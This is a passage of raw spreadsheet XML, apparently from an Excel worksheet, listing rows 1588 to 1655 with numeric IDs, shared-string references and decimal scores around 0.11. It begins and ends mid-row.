      <c r="D1588" s="2">
        <v>1.0</v>
      </c>
      <c r="E1588" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1588" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="1589" ht="15.75" customHeight="1">
      <c r="A1589" s="1">
        <v>27287.0</v>
      </c>
      <c r="B1589" s="2">
        <v>2.1239261E7</v>
      </c>
      <c r="C1589" s="2" t="s">
        <v>1444</v>
      </c>
      <c r="D1589" s="2">
        <v>1.0</v>
      </c>
      <c r="E1589" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1589" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="1590" ht="15.75" customHeight="1">
      <c r="A1590" s="1">
        <v>28268.0</v>
      </c>
      <c r="B1590" s="2">
        <v>2.5377071E7</v>
      </c>
      <c r="C1590" s="2" t="s">
        <v>1445</v>
      </c>
      <c r="D1590" s="2">
        <v>1.0</v>
      </c>
      <c r="E1590" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1590" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="1591" ht="15.75" customHeight="1">
      <c r="A1591" s="1">
        <v>33943.0</v>
      </c>
      <c r="B1591" s="2">
        <v>9290233.0</v>
      </c>
      <c r="C1591" s="2" t="s">
        <v>1446</v>
      </c>
      <c r="D1591" s="2">
        <v>1.0</v>
      </c>
      <c r="E1591" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1591" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="1592" ht="15.75" customHeight="1">
      <c r="A1592" s="1">
        <v>23551.0</v>
      </c>
      <c r="B1592" s="2">
        <v>6065411.0</v>
      </c>
      <c r="C1592" s="2" t="s">
        <v>1447</v>
      </c>
      <c r="D1592" s="2">
        <v>1.0</v>
      </c>
      <c r="E1592" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1592" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="1593" ht="15.75" customHeight="1">
      <c r="A1593" s="1">
        <v>33272.0</v>
      </c>
      <c r="B1593" s="2">
        <v>7411633.0</v>
      </c>
      <c r="C1593" s="2" t="s">
        <v>1448</v>
      </c>
      <c r="D1593" s="2">
        <v>1.0</v>
      </c>
      <c r="E1593" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1593" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="1594" ht="15.75" customHeight="1">
      <c r="A1594" s="1">
        <v>9378.0</v>
      </c>
      <c r="B1594" s="2">
        <v>5.571602E7</v>
      </c>
      <c r="C1594" s="2" t="s">
        <v>1449</v>
      </c>
      <c r="D1594" s="2">
        <v>1.0</v>
      </c>
      <c r="E1594" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1594" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="1595" ht="15.75" customHeight="1">
      <c r="A1595" s="1">
        <v>22718.0</v>
      </c>
      <c r="B1595" s="2">
        <v>4.3410783E7</v>
      </c>
      <c r="C1595" s="2" t="s">
        <v>1450</v>
      </c>
      <c r="D1595" s="2">
        <v>1.0</v>
      </c>
      <c r="E1595" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1595" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="1596" ht="15.75" customHeight="1">
      <c r="A1596" s="1">
        <v>25820.0</v>
      </c>
      <c r="B1596" s="2">
        <v>1.4769431E7</v>
      </c>
      <c r="C1596" s="2" t="s">
        <v>1451</v>
      </c>
      <c r="D1596" s="2">
        <v>1.0</v>
      </c>
      <c r="E1596" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1596" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="1597" ht="15.75" customHeight="1">
      <c r="A1597" s="1">
        <v>33995.0</v>
      </c>
      <c r="B1597" s="2">
        <v>9445747.0</v>
      </c>
      <c r="C1597" s="2" t="s">
        <v>1452</v>
      </c>
      <c r="D1597" s="2">
        <v>1.0</v>
      </c>
      <c r="E1597" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1597" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="1598" ht="15.75" customHeight="1">
      <c r="A1598" s="1">
        <v>29200.0</v>
      </c>
      <c r="B1598" s="2">
        <v>3.0766178E7</v>
      </c>
      <c r="C1598" s="2" t="s">
        <v>1453</v>
      </c>
      <c r="D1598" s="2">
        <v>1.0</v>
      </c>
      <c r="E1598" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1598" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="1599" ht="15.75" customHeight="1">
      <c r="A1599" s="1">
        <v>32262.0</v>
      </c>
      <c r="B1599" s="2">
        <v>5.5164234E7</v>
      </c>
      <c r="C1599" s="2" t="s">
        <v>1454</v>
      </c>
      <c r="D1599" s="2">
        <v>1.0</v>
      </c>
      <c r="E1599" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1599" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="1600" ht="15.75" customHeight="1">
      <c r="A1600" s="1">
        <v>32614.0</v>
      </c>
      <c r="B1600" s="2">
        <v>5828025.0</v>
      </c>
      <c r="C1600" s="2" t="s">
        <v>1455</v>
      </c>
      <c r="D1600" s="2">
        <v>1.0</v>
      </c>
      <c r="E1600" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1600" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="1601" ht="15.75" customHeight="1">
      <c r="A1601" s="1">
        <v>5115.0</v>
      </c>
      <c r="B1601" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C1601" s="2" t="s">
        <v>1456</v>
      </c>
      <c r="D1601" s="2">
        <v>1.0</v>
      </c>
      <c r="E1601" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1601" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1602" ht="15.75" customHeight="1">
      <c r="A1602" s="1">
        <v>7593.0</v>
      </c>
      <c r="B1602" s="2">
        <v>5.1606302E7</v>
      </c>
      <c r="C1602" s="2" t="s">
        <v>1457</v>
      </c>
      <c r="D1602" s="2">
        <v>1.0</v>
      </c>
      <c r="E1602" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1602" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1603" ht="15.75" customHeight="1">
      <c r="A1603" s="1">
        <v>24619.0</v>
      </c>
      <c r="B1603" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C1603" s="2" t="s">
        <v>1458</v>
      </c>
      <c r="D1603" s="2">
        <v>1.0</v>
      </c>
      <c r="E1603" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1603" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1604" ht="15.75" customHeight="1">
      <c r="A1604" s="1">
        <v>24631.0</v>
      </c>
      <c r="B1604" s="2">
        <v>1.1473842E7</v>
      </c>
      <c r="C1604" s="2" t="s">
        <v>1459</v>
      </c>
      <c r="D1604" s="2">
        <v>1.0</v>
      </c>
      <c r="E1604" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1604" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1605" ht="15.75" customHeight="1">
      <c r="A1605" s="1">
        <v>26442.0</v>
      </c>
      <c r="B1605" s="2">
        <v>1.7268039E7</v>
      </c>
      <c r="C1605" s="2" t="s">
        <v>1460</v>
      </c>
      <c r="D1605" s="2">
        <v>1.0</v>
      </c>
      <c r="E1605" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1605" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1606" ht="15.75" customHeight="1">
      <c r="A1606" s="1">
        <v>27465.0</v>
      </c>
      <c r="B1606" s="2">
        <v>2.1987265E7</v>
      </c>
      <c r="C1606" s="2" t="s">
        <v>1461</v>
      </c>
      <c r="D1606" s="2">
        <v>1.0</v>
      </c>
      <c r="E1606" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1606" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1607" ht="15.75" customHeight="1">
      <c r="A1607" s="1">
        <v>28005.0</v>
      </c>
      <c r="B1607" s="2">
        <v>2.4335313E7</v>
      </c>
      <c r="C1607" s="2" t="s">
        <v>1462</v>
      </c>
      <c r="D1607" s="2">
        <v>1.0</v>
      </c>
      <c r="E1607" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1607" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1608" ht="15.75" customHeight="1">
      <c r="A1608" s="1">
        <v>30150.0</v>
      </c>
      <c r="B1608" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C1608" s="2" t="s">
        <v>1463</v>
      </c>
      <c r="D1608" s="2">
        <v>1.0</v>
      </c>
      <c r="E1608" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1608" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="1609" ht="15.75" customHeight="1">
      <c r="A1609" s="1">
        <v>31458.0</v>
      </c>
      <c r="B1609" s="2">
        <v>5039368.0</v>
      </c>
      <c r="C1609" s="2" t="s">
        <v>1464</v>
      </c>
      <c r="D1609" s="2">
        <v>1.0</v>
      </c>
      <c r="E1609" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1609" s="2">
        <v>0.1136752136752137</v>
      </c>
    </row>
    <row r="1610" ht="15.75" customHeight="1">
      <c r="A1610" s="1">
        <v>33508.0</v>
      </c>
      <c r="B1610" s="2">
        <v>8077940.0</v>
      </c>
      <c r="C1610" s="2" t="s">
        <v>1465</v>
      </c>
      <c r="D1610" s="2">
        <v>1.0</v>
      </c>
      <c r="E1610" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1610" s="2">
        <v>0.1136752136752137</v>
      </c>
    </row>
    <row r="1611" ht="15.75" customHeight="1">
      <c r="A1611" s="1">
        <v>12174.0</v>
      </c>
      <c r="B1611" s="2">
        <v>2.7452521E7</v>
      </c>
      <c r="C1611" s="2" t="s">
        <v>1466</v>
      </c>
      <c r="D1611" s="2">
        <v>1.0</v>
      </c>
      <c r="E1611" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1611" s="2">
        <v>0.1136363636363637</v>
      </c>
    </row>
    <row r="1612" ht="15.75" customHeight="1">
      <c r="A1612" s="1">
        <v>11109.0</v>
      </c>
      <c r="B1612" s="2">
        <v>1.8751544E7</v>
      </c>
      <c r="C1612" s="2" t="s">
        <v>1467</v>
      </c>
      <c r="D1612" s="2">
        <v>1.0</v>
      </c>
      <c r="E1612" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1612" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="1613" ht="15.75" customHeight="1">
      <c r="A1613" s="1">
        <v>30581.0</v>
      </c>
      <c r="B1613" s="2">
        <v>4112371.0</v>
      </c>
      <c r="C1613" s="2" t="s">
        <v>1468</v>
      </c>
      <c r="D1613" s="2">
        <v>1.0</v>
      </c>
      <c r="E1613" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1613" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="1614" ht="15.75" customHeight="1">
      <c r="A1614" s="1">
        <v>10324.0</v>
      </c>
      <c r="B1614" s="2">
        <v>5.7709146E7</v>
      </c>
      <c r="C1614" s="2" t="s">
        <v>1469</v>
      </c>
      <c r="D1614" s="2">
        <v>1.0</v>
      </c>
      <c r="E1614" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1614" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="1615" ht="15.75" customHeight="1">
      <c r="A1615" s="1">
        <v>10819.0</v>
      </c>
      <c r="B1615" s="2">
        <v>1.5860924E7</v>
      </c>
      <c r="C1615" s="2" t="s">
        <v>1470</v>
      </c>
      <c r="D1615" s="2">
        <v>1.0</v>
      </c>
      <c r="E1615" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1615" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="1616" ht="15.75" customHeight="1">
      <c r="A1616" s="1">
        <v>11910.0</v>
      </c>
      <c r="B1616" s="2">
        <v>2.523752E7</v>
      </c>
      <c r="C1616" s="2" t="s">
        <v>1471</v>
      </c>
      <c r="D1616" s="2">
        <v>1.0</v>
      </c>
      <c r="E1616" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1616" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="1617" ht="15.75" customHeight="1">
      <c r="A1617" s="1">
        <v>18593.0</v>
      </c>
      <c r="B1617" s="2">
        <v>5.3259342E7</v>
      </c>
      <c r="C1617" s="2" t="s">
        <v>1472</v>
      </c>
      <c r="D1617" s="2">
        <v>1.0</v>
      </c>
      <c r="E1617" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1617" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="1618" ht="15.75" customHeight="1">
      <c r="A1618" s="1">
        <v>27103.0</v>
      </c>
      <c r="B1618" s="2">
        <v>2.0547628E7</v>
      </c>
      <c r="C1618" s="2" t="s">
        <v>1473</v>
      </c>
      <c r="D1618" s="2">
        <v>1.0</v>
      </c>
      <c r="E1618" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1618" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="1619" ht="15.75" customHeight="1">
      <c r="A1619" s="1">
        <v>29582.0</v>
      </c>
      <c r="B1619" s="2">
        <v>3.3496313E7</v>
      </c>
      <c r="C1619" s="2" t="s">
        <v>1474</v>
      </c>
      <c r="D1619" s="2">
        <v>1.0</v>
      </c>
      <c r="E1619" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1619" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="1620" ht="15.75" customHeight="1">
      <c r="A1620" s="1">
        <v>31191.0</v>
      </c>
      <c r="B1620" s="2">
        <v>4918684.0</v>
      </c>
      <c r="C1620" s="2" t="s">
        <v>1304</v>
      </c>
      <c r="D1620" s="2">
        <v>1.0</v>
      </c>
      <c r="E1620" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1620" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="1621" ht="15.75" customHeight="1">
      <c r="A1621" s="1">
        <v>1520.0</v>
      </c>
      <c r="B1621" s="2">
        <v>2.7368113E7</v>
      </c>
      <c r="C1621" s="2" t="s">
        <v>1475</v>
      </c>
      <c r="D1621" s="2">
        <v>1.0</v>
      </c>
      <c r="E1621" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1621" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1622" ht="15.75" customHeight="1">
      <c r="A1622" s="1">
        <v>4237.0</v>
      </c>
      <c r="B1622" s="2">
        <v>4.1787731E7</v>
      </c>
      <c r="C1622" s="2" t="s">
        <v>1476</v>
      </c>
      <c r="D1622" s="2">
        <v>1.0</v>
      </c>
      <c r="E1622" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1622" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1623" ht="15.75" customHeight="1">
      <c r="A1623" s="1">
        <v>5704.0</v>
      </c>
      <c r="B1623" s="2">
        <v>4.6538095E7</v>
      </c>
      <c r="C1623" s="2" t="s">
        <v>1477</v>
      </c>
      <c r="D1623" s="2">
        <v>1.0</v>
      </c>
      <c r="E1623" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1623" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1624" ht="15.75" customHeight="1">
      <c r="A1624" s="1">
        <v>6036.0</v>
      </c>
      <c r="B1624" s="2">
        <v>4.7582443E7</v>
      </c>
      <c r="C1624" s="2" t="s">
        <v>1478</v>
      </c>
      <c r="D1624" s="2">
        <v>1.0</v>
      </c>
      <c r="E1624" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1624" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1625" ht="15.75" customHeight="1">
      <c r="A1625" s="1">
        <v>11852.0</v>
      </c>
      <c r="B1625" s="2">
        <v>2.4750118E7</v>
      </c>
      <c r="C1625" s="2" t="s">
        <v>1479</v>
      </c>
      <c r="D1625" s="2">
        <v>1.0</v>
      </c>
      <c r="E1625" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1625" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1626" ht="15.75" customHeight="1">
      <c r="A1626" s="1">
        <v>11939.0</v>
      </c>
      <c r="B1626" s="2">
        <v>2.55007E7</v>
      </c>
      <c r="C1626" s="2" t="s">
        <v>1480</v>
      </c>
      <c r="D1626" s="2">
        <v>1.0</v>
      </c>
      <c r="E1626" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1626" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1627" ht="15.75" customHeight="1">
      <c r="A1627" s="1">
        <v>15913.0</v>
      </c>
      <c r="B1627" s="2">
        <v>4.4655493E7</v>
      </c>
      <c r="C1627" s="2" t="s">
        <v>1481</v>
      </c>
      <c r="D1627" s="2">
        <v>1.0</v>
      </c>
      <c r="E1627" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1627" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1628" ht="15.75" customHeight="1">
      <c r="A1628" s="1">
        <v>16313.0</v>
      </c>
      <c r="B1628" s="2">
        <v>4.5959535E7</v>
      </c>
      <c r="C1628" s="2" t="s">
        <v>1482</v>
      </c>
      <c r="D1628" s="2">
        <v>1.0</v>
      </c>
      <c r="E1628" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1628" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1629" ht="15.75" customHeight="1">
      <c r="A1629" s="1">
        <v>16634.0</v>
      </c>
      <c r="B1629" s="2">
        <v>4.7101334E7</v>
      </c>
      <c r="C1629" s="2" t="s">
        <v>1483</v>
      </c>
      <c r="D1629" s="2">
        <v>1.0</v>
      </c>
      <c r="E1629" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1629" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1630" ht="15.75" customHeight="1">
      <c r="A1630" s="1">
        <v>17583.0</v>
      </c>
      <c r="B1630" s="2">
        <v>5.027548E7</v>
      </c>
      <c r="C1630" s="2" t="s">
        <v>1484</v>
      </c>
      <c r="D1630" s="2">
        <v>1.0</v>
      </c>
      <c r="E1630" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1630" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1631" ht="15.75" customHeight="1">
      <c r="A1631" s="1">
        <v>22005.0</v>
      </c>
      <c r="B1631" s="2">
        <v>2.9812645E7</v>
      </c>
      <c r="C1631" s="2" t="s">
        <v>1485</v>
      </c>
      <c r="D1631" s="2">
        <v>1.0</v>
      </c>
      <c r="E1631" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1631" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1632" ht="15.75" customHeight="1">
      <c r="A1632" s="1">
        <v>22299.0</v>
      </c>
      <c r="B1632" s="2">
        <v>3.3579687E7</v>
      </c>
      <c r="C1632" s="2" t="s">
        <v>1486</v>
      </c>
      <c r="D1632" s="2">
        <v>1.0</v>
      </c>
      <c r="E1632" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1632" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1633" ht="15.75" customHeight="1">
      <c r="A1633" s="1">
        <v>22331.0</v>
      </c>
      <c r="B1633" s="2">
        <v>3.4199035E7</v>
      </c>
      <c r="C1633" s="2" t="s">
        <v>1487</v>
      </c>
      <c r="D1633" s="2">
        <v>1.0</v>
      </c>
      <c r="E1633" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1633" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1634" ht="15.75" customHeight="1">
      <c r="A1634" s="1">
        <v>23676.0</v>
      </c>
      <c r="B1634" s="2">
        <v>6934953.0</v>
      </c>
      <c r="C1634" s="2" t="s">
        <v>1488</v>
      </c>
      <c r="D1634" s="2">
        <v>1.0</v>
      </c>
      <c r="E1634" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1634" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1635" ht="15.75" customHeight="1">
      <c r="A1635" s="1">
        <v>27488.0</v>
      </c>
      <c r="B1635" s="2">
        <v>2.2039069E7</v>
      </c>
      <c r="C1635" s="2" t="s">
        <v>1489</v>
      </c>
      <c r="D1635" s="2">
        <v>1.0</v>
      </c>
      <c r="E1635" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1635" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1636" ht="15.75" customHeight="1">
      <c r="A1636" s="1">
        <v>27819.0</v>
      </c>
      <c r="B1636" s="2">
        <v>2.3365037E7</v>
      </c>
      <c r="C1636" s="2" t="s">
        <v>1490</v>
      </c>
      <c r="D1636" s="2">
        <v>1.0</v>
      </c>
      <c r="E1636" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1636" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1637" ht="15.75" customHeight="1">
      <c r="A1637" s="1">
        <v>28432.0</v>
      </c>
      <c r="B1637" s="2">
        <v>2.6467454E7</v>
      </c>
      <c r="C1637" s="2" t="s">
        <v>1491</v>
      </c>
      <c r="D1637" s="2">
        <v>1.0</v>
      </c>
      <c r="E1637" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1637" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1638" ht="15.75" customHeight="1">
      <c r="A1638" s="1">
        <v>33819.0</v>
      </c>
      <c r="B1638" s="2">
        <v>8906166.0</v>
      </c>
      <c r="C1638" s="2" t="s">
        <v>1492</v>
      </c>
      <c r="D1638" s="2">
        <v>1.0</v>
      </c>
      <c r="E1638" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1638" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="1639" ht="15.75" customHeight="1">
      <c r="A1639" s="1">
        <v>868.0</v>
      </c>
      <c r="B1639" s="2">
        <v>2.1869936E7</v>
      </c>
      <c r="C1639" s="2" t="s">
        <v>1493</v>
      </c>
      <c r="D1639" s="2">
        <v>1.0</v>
      </c>
      <c r="E1639" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1639" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1640" ht="15.75" customHeight="1">
      <c r="A1640" s="1">
        <v>1584.0</v>
      </c>
      <c r="B1640" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C1640" s="2" t="s">
        <v>1494</v>
      </c>
      <c r="D1640" s="2">
        <v>1.0</v>
      </c>
      <c r="E1640" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1640" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1641" ht="15.75" customHeight="1">
      <c r="A1641" s="1">
        <v>1802.0</v>
      </c>
      <c r="B1641" s="2">
        <v>2.9137578E7</v>
      </c>
      <c r="C1641" s="2" t="s">
        <v>1495</v>
      </c>
      <c r="D1641" s="2">
        <v>1.0</v>
      </c>
      <c r="E1641" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1641" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1642" ht="15.75" customHeight="1">
      <c r="A1642" s="1">
        <v>3084.0</v>
      </c>
      <c r="B1642" s="2">
        <v>3.6614833E7</v>
      </c>
      <c r="C1642" s="2" t="s">
        <v>1496</v>
      </c>
      <c r="D1642" s="2">
        <v>1.0</v>
      </c>
      <c r="E1642" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1642" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1643" ht="15.75" customHeight="1">
      <c r="A1643" s="1">
        <v>3912.0</v>
      </c>
      <c r="B1643" s="2">
        <v>4.0514178E7</v>
      </c>
      <c r="C1643" s="2" t="s">
        <v>1497</v>
      </c>
      <c r="D1643" s="2">
        <v>1.0</v>
      </c>
      <c r="E1643" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1643" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1644" ht="15.75" customHeight="1">
      <c r="A1644" s="1">
        <v>4716.0</v>
      </c>
      <c r="B1644" s="2">
        <v>4.3298326E7</v>
      </c>
      <c r="C1644" s="2" t="s">
        <v>1498</v>
      </c>
      <c r="D1644" s="2">
        <v>1.0</v>
      </c>
      <c r="E1644" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1644" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1645" ht="15.75" customHeight="1">
      <c r="A1645" s="1">
        <v>5136.0</v>
      </c>
      <c r="B1645" s="2">
        <v>4.4623925E7</v>
      </c>
      <c r="C1645" s="2" t="s">
        <v>1499</v>
      </c>
      <c r="D1645" s="2">
        <v>1.0</v>
      </c>
      <c r="E1645" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1645" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1646" ht="15.75" customHeight="1">
      <c r="A1646" s="1">
        <v>5396.0</v>
      </c>
      <c r="B1646" s="2">
        <v>4.5467433E7</v>
      </c>
      <c r="C1646" s="2" t="s">
        <v>1500</v>
      </c>
      <c r="D1646" s="2">
        <v>1.0</v>
      </c>
      <c r="E1646" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1646" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1647" ht="15.75" customHeight="1">
      <c r="A1647" s="1">
        <v>6178.0</v>
      </c>
      <c r="B1647" s="2">
        <v>4.7895736E7</v>
      </c>
      <c r="C1647" s="2" t="s">
        <v>1501</v>
      </c>
      <c r="D1647" s="2">
        <v>1.0</v>
      </c>
      <c r="E1647" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1647" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1648" ht="15.75" customHeight="1">
      <c r="A1648" s="1">
        <v>6516.0</v>
      </c>
      <c r="B1648" s="2">
        <v>4.8786111E7</v>
      </c>
      <c r="C1648" s="2" t="s">
        <v>1502</v>
      </c>
      <c r="D1648" s="2">
        <v>1.0</v>
      </c>
      <c r="E1648" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1648" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1649" ht="15.75" customHeight="1">
      <c r="A1649" s="1">
        <v>6534.0</v>
      </c>
      <c r="B1649" s="2">
        <v>4.8829107E7</v>
      </c>
      <c r="C1649" s="2" t="s">
        <v>1503</v>
      </c>
      <c r="D1649" s="2">
        <v>1.0</v>
      </c>
      <c r="E1649" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1649" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1650" ht="15.75" customHeight="1">
      <c r="A1650" s="1">
        <v>6678.0</v>
      </c>
      <c r="B1650" s="2">
        <v>4.9166488E7</v>
      </c>
      <c r="C1650" s="2" t="s">
        <v>1504</v>
      </c>
      <c r="D1650" s="2">
        <v>1.0</v>
      </c>
      <c r="E1650" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1650" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1651" ht="15.75" customHeight="1">
      <c r="A1651" s="1">
        <v>7757.0</v>
      </c>
      <c r="B1651" s="2">
        <v>5.210177E7</v>
      </c>
      <c r="C1651" s="2" t="s">
        <v>1505</v>
      </c>
      <c r="D1651" s="2">
        <v>1.0</v>
      </c>
      <c r="E1651" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1651" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1652" ht="15.75" customHeight="1">
      <c r="A1652" s="1">
        <v>8917.0</v>
      </c>
      <c r="B1652" s="2">
        <v>5.4818812E7</v>
      </c>
      <c r="C1652" s="2" t="s">
        <v>1506</v>
      </c>
      <c r="D1652" s="2">
        <v>1.0</v>
      </c>
      <c r="E1652" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1652" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1653" ht="15.75" customHeight="1">
      <c r="A1653" s="1">
        <v>9321.0</v>
      </c>
      <c r="B1653" s="2">
        <v>5.558073E7</v>
      </c>
      <c r="C1653" s="2" t="s">
        <v>1507</v>
      </c>
      <c r="D1653" s="2">
        <v>1.0</v>
      </c>
      <c r="E1653" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1653" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1654" ht="15.75" customHeight="1">
      <c r="A1654" s="1">
        <v>10833.0</v>
      </c>
      <c r="B1654" s="2">
        <v>1.5992104E7</v>
      </c>
      <c r="C1654" s="2" t="s">
        <v>1508</v>
      </c>
      <c r="D1654" s="2">
        <v>1.0</v>
      </c>
      <c r="E1654" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1654" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1655" ht="15.75" customHeight="1">
      <c r="A1655" s="1">
        <v>11025.0</v>
      </c>
      <c r="B1655" s="2">
        <v>1.7884274E7</v>
      </c>
      <c r="C1655" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="D1655" s="2">
        <v>1.0</v>
      </c>
      <c r="E1655" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1655" s="2">
